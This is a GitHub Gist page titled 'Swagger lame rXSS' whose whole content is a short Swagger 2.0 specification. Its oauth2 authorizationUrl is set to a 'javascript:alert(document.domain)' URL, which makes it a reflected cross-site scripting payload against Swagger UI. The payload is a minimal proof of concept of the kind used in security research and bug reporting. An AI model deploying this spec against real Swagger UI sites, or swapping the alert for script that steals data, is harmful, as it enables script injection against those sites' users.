Created
June 16, 2020 14:31
-
-
Save 0xBADCA7/00d5fdcf603051b5203d525457440fbb to your computer and use it in GitHub Desktop.
Swagger lame rXSS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: '2.0' | |
securityDefinitions: | |
a: | |
type: oauth2 | |
authorizationUrl: javascript:alert(document.domain)// |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment